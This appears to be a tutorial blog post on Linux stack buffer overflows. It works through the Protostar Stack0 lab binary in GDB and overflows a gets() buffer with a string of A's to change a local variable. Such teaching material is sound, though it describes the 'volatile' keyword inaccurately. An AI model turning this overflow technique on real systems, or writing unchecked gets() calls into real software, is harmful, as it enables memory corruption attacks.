Reverse Engineering and Exploit Development Made Easy: Linux Buffer Overflows – Memory Corruption

Introduction

In this post, we will dive into the basics of Linux exploitation. To understand the basics of Linux exploitation, we will be looking at the first form: Stack buffer overflows. We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.

Setup

Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.

So grab an iso from Protostar, and set it up in your desired virtual machine manager. I will be using VirtualBox as always. We will use ssh to log into this VM ( use hostname –I to get the local IP of the VM). The default credentials for Protostar are user:user.

Tools

For Linux, the choice of debuggers isn’t as varied as Windows. Throughout our journey, we will be mainly using GDB (GNU Debugger), the default debugger that comes with Linux. You can alternatively use EDB.

As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).

Static Code Analysis

To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, that focuses on memory corruption. Take a look at the code below:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The includes are just importing usual C libraries. Stdlib.h is a general-purpose standard library that helps with memory allocation, process control, etc.

Unistd.h is a header file that provides access to the POSIX OS API. Similar to the standard library.

Stdio.h is the standard input/output header file that manages I/O operations.

The main function initializes two variables: buffer, that takes 64 characters, and modified, which is a volatile integer. This means that the variable modified can take multiple values. The main function also takes one user-supplied argument.

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

modified is initially set to 0, and the line below that is responsible for reading the characters in buffer from our input, and printing it on to the screen. The function that does this is gets().

 modified = 0;
 gets(buffer);

Now here is where our vulnerability lies, in the gets() function. The problem with gets() is, if we enter a string that is longer than 64 bytes, gets() does not do any check on the size whatsoever, so it will keep reading our input from the stack until it finds a new line. Which means, our string will OVERFLOW outside the given buffer of 64 bytes, and start to overwrite other variables, until our string ends.

In this case, we need to change the value of the modified variable, that is located somewhere on the stack. The if else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything (I.e. not equal to (!=) 0).

if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
} else {
    printf("Try again?\n");
}

Alrighty then! Now that we have analyzed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.

So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.

Debugging

To open the binary in GDB, we will use the command $ gdb stack0, followed by the command disas main inside gdb, which will disassemble the main function for us. What you see is a representation of the binary in assembly.

0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp
0x080483f7 <main+3>:    and    $0xfffffff0,%esp
0x080483fa <main+6>:    sub    $0x60,%esp
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:    lea    0x1c(%esp),%eax
0x08048409 <main+21>:    mov    %eax,(%esp)
0x0804840c <main+24>:    call   0x804830c <gets@plt>
0x08048411 <main+29>:    mov    0x5c(%esp),%eax
0x08048415 <main+33>:    test   %eax,%eax
0x08048417 <main+35>:    je     0x8048427 <main+51>
0x08048419 <main+37>:    movl   $0x8048500,(%esp)
0x08048420 <main+44>:    call   0x804832c <puts@plt>
0x08048425 <main+49>:    jmp    0x8048433 <main+63>
0x08048427 <main+51>:    movl   $0x8048529,(%esp)
0x0804842e <main+58>:    call   0x804832c <puts@plt>
0x08048433 <main+63>:    leave  
0x08048434 <main+64>:    ret

So right off the bat, even if you don’t understand assembly too well, you can see the call instruction, calling the function gets() at the address 0x0804840c. This will come in handy during testing.

So a few things before we continue:

ESP is our stack pointer. This points to the start/top of the stack.
PUSH is an instruction which pushes a value stored in a particular register to the top of the stack.
JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal to”, which means that after the comparison (the test instruction), if the condition is satisfied, it will jump to said location. This represents the “if-else” iteration in our code.

Our objective here is to change the value of the modified variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.

There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location esp + 0x5c.
This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.

We will do this by executing:

(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)

This will stop the execution flow before the call to gets() is made, and after that, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.

(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11

So we hit our first breakpoint, right before the call to gets(). If we run i r, it will give us further information on the registers at this point of time.

(gdb) i r
eax            0xbffffc5c    -1073742756
ecx            0x644d8780    1682802560
edx            0x1    1
ebx            0xb7fd7ff4    -1208123404
esp            0xbffffc40    0xbffffc40
ebp            0xbffffca8    0xbffffca8
esi            0x0    0
edi            0x0    0
eip            0x804840c    0x804840c <main+24>
eflags         0x200282    [ SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

We can see that the address of the call instruction is in the EIP register. EIP holds the address to the next instruction which is to be executed. Now, let’s take a look at what the stack looks like right now by executing x/30wx $esp.This will print 32 hexadecimal words off the stack. 30 has just been taken for simplicity purposes.

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0xb7eada75
0xbffffc60:    0xb7fd7ff4  0x08049620  0xbffffc78  0x080482e8
0xbffffc70:    0xb7ff1040  0x08049620  0xbffffca8  0x08048469
0xbffffc80:    0xb7fd8304  0xb7fd7ff4  0x08048450  0xbffffca8
0xbffffc90:    0xb7ec6365  0xb7ff1040  0x0804845b  0x00000000
0xbffffca0:    0x08048450  0x00000000  0xbffffd28  0xb7eadc76
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp). x/wx stands for ‘examine’, so this will give us the address and the contents of modified.

(gdb) x/wx $esp+0x5c
0xbffffc9c:    0x00000000

From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified is:

                          These are contents
           |---------------------|---------------------|
           |                                           |
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 <---- modified

Addresses:  0xbffffc90 0xbffffc94 0xbffffc98 0xbffffc9c

Each address here is 4 bytes long, so the contents of c90 is given after the colon. If we add 4 bytes after c90 three times until we reach 0x0000000, we get the address as c9c. This is how the math works out in GDB.

Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13    in stack0/stack0.c

We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (The if-else iteration). Now, let’s take a look at the stack:

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0x41414141
0xbffffc60:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc70:    0x41414141  0x41414141  0xbffffc00  0x08048469
0xbffffc80:    0xb7fd8304  0xb7fd7ff4  0x08048450  0xbffffca8
0xbffffc90:    0xb7ec6365  0xb7ff1040  0x0804845b  0x00000000 <-----
0xbffffca0:    0x08048450  0x00000000  0xbffffd28  0xb7eadc76
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

So the hexadecimal value of A is 0x41. We can see our A’s starting at 0xbffffc60. This suggests that our buffer starts at this address. We can also see that we still have not reached the modified variable, which is why we haven’t been able to overwrite the value. Remember the size of our buffer? 64. If we enter about 80 A’s, we may be able overflow the modified variable and change it’s value. Let’s give this a shot:

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11    in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13    in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0x41414141
0xbffffc60:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc70:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc80:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc90:    0x41414141  0x41414141  0x41414141  0x41414141 <----
0xbffffca0:    0x41414141  0x41414141  0x41414141  0xb7eadc00
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

Et voila! We have overwritten the value of the modified variable, and also overwritten variables after that with out A’s. Let’s do this outside of GDB now:

$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault

We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!